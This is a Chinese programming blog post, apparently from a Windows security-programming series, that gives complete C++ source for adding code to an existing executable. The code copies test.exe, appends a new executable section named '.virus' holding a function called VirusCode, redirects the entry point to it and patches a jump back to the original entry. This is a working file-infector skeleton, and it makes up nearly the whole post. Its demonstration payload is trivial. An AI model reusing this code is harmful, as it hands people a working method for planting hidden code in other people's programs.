zoukankan      html  css  js  c++  java
  • 基于visual c++之windows核心编程代码分析(64)现有的exe文件中添加自己的代码

    我们进行信息安全编程的时候,经常需要向exe文件插入自己的源代码,

    我们如何在代码中实现呢。请见代码与注释讲解

    #include <iostream.h>
    #include <windows.h>
    #include <stdio.h>
    
    //////////////////////////////////////////////////////////////////////////
    //*******************************************************************
    //*******以下为程序代码*******
    //*******************************************************************
    //////////////////////////////////////////////////////////////////////////
    void VirusCode()
    {
    	_asm 
    	{
    		mov eax , 5
    	}
    
    	return;
    }
    
    
    
    //////////////////////////////////////////////////////////////////////////
    //*******************************************************************
    //*******主函数*******
    //*******************************************************************
    //////////////////////////////////////////////////////////////////////////
    void main()
    {
    //*******************************************************************
    //*******首先得到程序代码起始地址,结束地址,代码长度*******
    //*******************************************************************
    	/////////////////////////////////////////////////////////////////
    	//	*******变量说明*******
    	//	**dwFunBegAddr	:程序函数的开始地址
    	//	**dwFunEndAddr	:程序函数的结束地址
    	//	**dwFunCodeLen	:程序代码长度
    	//	**dwJmpOff		:程序函数jmp区到真正入口的偏移
    	//	**pMove			:临时的指针变量
    	/////////////////////////////////////////////////////////////////
    	DWORD dwFunBegAddr , dwJmpOff , dwFunEndAddr , dwFunCodeLen;
    	PBYTE pMove = NULL;
    	
    	//	*******首先指向程序函数的jmp指令*******
    	pMove = (PBYTE)VirusCode;
    	
    	cout << "函数的jmp地址为:" << (PVOID)pMove << endl;
    	//	*******定位到jmp后面的偏移处*******
    	pMove ++;
    
    	//	*******把偏移赋值给变量*******
    	dwJmpOff = *((PDWORD)pMove);
    
    	//	*******jmp下一条指令的地址(code + 5)+偏移得到函数真正的入口地址*******
    	dwFunBegAddr = (DWORD)VirusCode + 5 + dwJmpOff;
    
    	cout << "函数jmp的跳转偏移为:" <<(PVOID)dwJmpOff << endl;
    	cout << "开始地址为:" << (PVOID)dwFunBegAddr << endl;
    	
    	//	*******以下通过搜索得到函数的结束地址*******
    	//	*******首先把函数的入口地址赋给变量*******
    	pMove = (PBYTE)dwFunBegAddr;
    
    	//	*******向后搜索,直到结尾*******
    	while (!((*(pMove + 1) == 0xc3) && (*pMove == 0x5D) && (*(pMove - 1) == 0xE5)))
    	{
    		pMove ++;
    	}
    
    	//	*******此时pMove指向ret前一条指令*******
    	//	*******pMove向后移5个字节,为程序代码的jmp指令占位*******
    	pMove +=5;
    	dwFunEndAddr = (DWORD)pMove;
    
    
    	cout << "代码结束地址为:" << (PVOID)dwFunEndAddr << endl;
    
    	//	*******结束地址减去起始地址,得到代码长度*******
    	dwFunCodeLen = dwFunEndAddr - dwFunBegAddr;
    
    	cout << "总代码长度为:" << (int)dwFunCodeLen << endl;
    
    //*******************************************************************
    //*******以下为在exe文件中添加程序代码*******
    //*******************************************************************
    	HANDLE hFile , hMapFile;
    	LPVOID pMapOfFile = NULL;
    	
    //*******************************************************************
    //*******检测文件合法性*******
    //*******************************************************************
    	//	*******打开文件*******
    	hFile = CreateFile("test.exe" , GENERIC_READ , FILE_SHARE_READ | 
    			FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_ARCHIVE , NULL);
    
    	if (INVALID_HANDLE_VALUE == hFile)
    	{
    		cout << "CreateFile Error!" << endl;
    		return;
    	}
    
    	//	*******创建文件映射*******
    	hMapFile = CreateFileMapping(hFile , NULL , PAGE_READONLY , 0 , 0 , NULL);
    
    	if (!hMapFile)
    	{
    		cout << "CreateFileMapping Error!" << endl;
    		goto CLOSEFILEHANDLE;
    	}
    
    	//	*******把文件映射到内存中*******
    	pMapOfFile = MapViewOfFile(hMapFile , FILE_MAP_READ , 0 , 0 , 0);
    
    	if (!pMapOfFile)
    	{
    		cout << "MapViewOfFile Error!" << endl;
    		goto CLOSEMAPHANDLE;
    	}
    
    	IMAGE_DOS_HEADER *pDosHeader;
    
    	//	********检测DOS文件头*******
    	pDosHeader = ( IMAGE_DOS_HEADER* )pMapOfFile;
    
    	if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
    	{
    		cout << "Check Dos Header Error!" << endl;
    		goto FreeViewOfMap;
    	}
    
    	IMAGE_NT_HEADERS *pNtHeader;
    
    	//	*******检测NT文件头*******
    	pNtHeader = (IMAGE_NT_HEADERS*)((PBYTE)pDosHeader + pDosHeader->e_lfanew);
    
    	if (pNtHeader->Signature != IMAGE_NT_SIGNATURE)
    	{
    		cout << "Check NT Header Error!" << endl;
    		goto FreeViewOfMap;
    	}
    //***************************************************************
    //*******准备工作*******
    //***************************************************************
    	BOOL bCopy;
    
    	//	*******首先把要添加程序代码的文件复制一份*******
    	bCopy = CopyFile("test.exe" , "test_virus.exe" , FALSE);
    	if (!bCopy)
    	{
    		cout << "CopyFile Error!" << endl;
    	}
    
    	HANDLE hNewFile;
    
    	//	*******打开刚刚复制的文件*******
    	hNewFile = CreateFile("test_virus.exe" , GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ 
    				| FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_ARCHIVE , NULL);
    
    	if (!hNewFile)
    	{
    		cout << "CreateFile Error!" << endl;
    		goto FreeViewOfMap;
    	}
    
    	HGLOBAL pNewFileHeader;
    
    	//	*******为新文件的文件头申请一块内存,用于修改文件头信息*******
    	pNewFileHeader = GlobalAlloc(GPTR , pNtHeader->OptionalHeader.SizeOfHeaders);
    
    	if (!pNewFileHeader)
    	{
    		cout << "GlobalAlloc Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    
    	//	*******用原文件头填充这块内存*******
    	RtlMoveMemory((PVOID)pNewFileHeader , (PVOID)pMapOfFile , pNtHeader->OptionalHeader.SizeOfHeaders);
    
    	IMAGE_NT_HEADERS *pNewFileNtHeader;
    
    	pNewFileNtHeader = (IMAGE_NT_HEADERS*)((PBYTE)pNewFileHeader + pDosHeader->e_lfanew);
    
    //////////////////////////////////////////////////////////////////////////
    //*******此时的指针信息*******
    //*******pMapOfFile			:	原映射文件的开始
    //*******pDosHeader			:	原映射文件的DOS头也就是文件开始,只不过类型不一样
    //*******pNTHeader			:	原映射文件的NT头
    //*******pNewFileHeader		:	新文件的开始
    //*******pNewFileNtHeader	:	新文件的NT头
    //////////////////////////////////////////////////////////////////////////
    //****************************************************************
    //*******修改新文件的节表信息*******
    //****************************************************************
    	int nSecNum;
    	nSecNum = pNtHeader->FileHeader.NumberOfSections;
    	IMAGE_SECTION_HEADER *pLastSec , *pNewSec;
    
    	//	*******定位到原文件中的最后一个节表*******
    	pLastSec = (IMAGE_SECTION_HEADER*)((PBYTE)pNewFileNtHeader + sizeof(IMAGE_NT_HEADERS)
    				+ (nSecNum-1) * sizeof(IMAGE_SECTION_HEADER));
    
    	//	*******pNewSec为最后一个节表的结尾处,也就是新加节表的开头*******
    	pNewSec = pLastSec + 1;
    
    	//*******修改新增节表的相关信息*******
    	//*****节表总数加1*****
    	pNewFileNtHeader->FileHeader.NumberOfSections ++;
    
    	//*****修改新节的文件偏移*****
    	pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData;
    
    	//*****修改新节的文件尺寸*****
    	int nAlignNum;
    
    	nAlignNum = dwFunCodeLen / pNewFileNtHeader->OptionalHeader.FileAlignment;
    	if (dwFunCodeLen % pNewFileNtHeader->OptionalHeader.FileAlignment != 0)
    	{
    		nAlignNum++;
    	}
    	pNewSec->SizeOfRawData = nAlignNum * pNewFileNtHeader->OptionalHeader.FileAlignment;
    
    	//*****修改所有代码长度按内存页对齐后的大小*****
    	nAlignNum = dwFunCodeLen / pNewFileNtHeader->OptionalHeader.SectionAlignment;
    	if (dwFunCodeLen % pNewFileNtHeader->OptionalHeader.SectionAlignment != 0)
    	{
    		nAlignNum ++;
    	}
    	pNewFileNtHeader->OptionalHeader.SizeOfCode += nAlignNum * 
    						pNewFileNtHeader->OptionalHeader.SectionAlignment;
    
    	//*****修改文件内存映像尺寸*****
    	pNewFileNtHeader->OptionalHeader.SizeOfImage += nAlignNum * 
    						pNewFileNtHeader->OptionalHeader.SectionAlignment;
    
    	//*****修改新节的内存偏移量*****
    	//*****用原最后节的内存偏移加上原最后节对齐后的内存尺寸的大小*****
    	nAlignNum = pLastSec->Misc.VirtualSize / 
    				pNewFileNtHeader->OptionalHeader.SectionAlignment;
    	if (pLastSec->Misc.VirtualSize % pNewFileNtHeader->OptionalHeader.SectionAlignment != 0)
    	{
    		nAlignNum ++;
    	}
    	pNewSec->VirtualAddress = nAlignNum * pNewFileNtHeader->OptionalHeader.SectionAlignment +
    								pLastSec->VirtualAddress;
    
    	//*****修改新节的内存尺寸*****
    	pNewSec->Misc.VirtualSize = dwFunCodeLen;
    
    	//*****更新新节属性*****
    	pNewSec->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | 
    					IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE;
    
    	//*****更新节名*****
    	strcpy((char*)pNewSec->Name , ".virus");
    
    	//*****更新入口地址*****
    
    	pNewFileNtHeader->OptionalHeader.AddressOfEntryPoint = pNewSec->VirtualAddress;
    
    	BOOL bWrite;
    	DWORD dwHeaderSize , dwWriten;
    	dwHeaderSize = (DWORD)(pNewFileNtHeader->OptionalHeader.SizeOfHeaders);
    	bWrite = WriteFile(hNewFile , (LPVOID)pNewFileHeader , dwHeaderSize , &dwWriten , NULL);
    
    	//*****向文件中添加程序代码*****
    	DWORD dwSetFileP;
    
    	//*****定位到新文件中新节开始处*****
    	dwSetFileP = SetFilePointer(hNewFile , pNewSec->PointerToRawData , NULL , FILE_BEGIN);
    	if (!dwSetFileP)
    	{
    		cout << "SetFilePointer Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    
    	//*****写入程序代码*****
    	bWrite = WriteFile(hNewFile , (LPVOID)dwFunBegAddr , dwFunCodeLen , &dwWriten , NULL);
    	if (!bWrite)
    	{
    		cout << "Write Virus Code Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    
    	//*****定位到文件尾部*****
    	dwSetFileP = SetFilePointer(hNewFile , pNewSec->PointerToRawData + 
    					pNewSec->SizeOfRawData , NULL , FILE_BEGIN);
    	if (!dwSetFileP)
    	{
    		cout << "SetFilePointer End Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    
    	//*****设定文件结束*****
    	if (!SetEndOfFile(hNewFile))
    	{
    		cout << "SetEndOfFile Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    
    	//*******修正原入口地址*******
    	PBYTE pModifyAddr;
    	pModifyAddr = (PBYTE)pNewSec->VirtualAddress;
    
    	pModifyAddr	+= dwFunCodeLen;
    	//printf("%x\n" , pModifyAddr);
    
    	int nSub;    //跳转的距离
    	nSub = (PBYTE)(pNtHeader->OptionalHeader.AddressOfEntryPoint) - pModifyAddr;
    
    	DWORD dwModifyLoca;
    	dwModifyLoca = pNewSec->PointerToRawData;
    	dwModifyLoca = dwModifyLoca + dwFunCodeLen - 5;
    	//dwModifyLoca ++;
    
    	//	*****定位到程序代码最后的五个字节处*****
    	dwSetFileP = SetFilePointer(hNewFile , dwModifyLoca , NULL , FILE_BEGIN);
    	if (!dwSetFileP)
    	{
    		cout << "Modify Address SetFilePointer Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    	//*****修正jmp指令*****
    	BYTE bJmp;
    	bJmp = 0XE9;
    	bWrite = WriteFile(hNewFile , &bJmp , 1 , &dwWriten , NULL);
    	if (!bWrite)
    	{
    		cout << "Modify Address WriteFile Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    	//*****修正跳转地址*****
    	bWrite = WriteFile(hNewFile , &nSub , 4 , &dwWriten , NULL);
    	if (!bWrite)
    	{
    		cout << "Modify Address WriteFile Error!" << endl;
    		goto CloseNewFileHandle;
    	}
    
    
    //****************************************************************
    //*******扫尾工作*******
    //****************************************************************
    CloseNewFileHandle:
    	CloseHandle(hNewFile);
    FreeViewOfMap:
    	UnmapViewOfFile(pMapOfFile);
    CLOSEMAPHANDLE:
    	CloseHandle(hMapFile);
    CLOSEFILEHANDLE:
    	CloseHandle(hFile);
    }


     

  • 相关阅读:
    Elementui el-input 实现自定义 v-model
    巧用Ajax的beforeSend 提高用户体验
    医生不会告诉你,它是天然“安眠药”,一周吃2次,一觉自然醒!
    CentOS下搭建SVN服务器
    linux下 mysql数据库的备份和还原
    最新sublime text 3 注册码license分享(亲测有效)
    Centos 安装 Nginx 详细过程
    centos如何安装Python3
    python安装提示No module named setuptools,wget提示ERROR 403: SSL is required
    bash: pip: command not found... 解决方法
  • 原文地址:https://www.cnblogs.com/new0801/p/6177761.html
Copyright © 2011-2022 走看看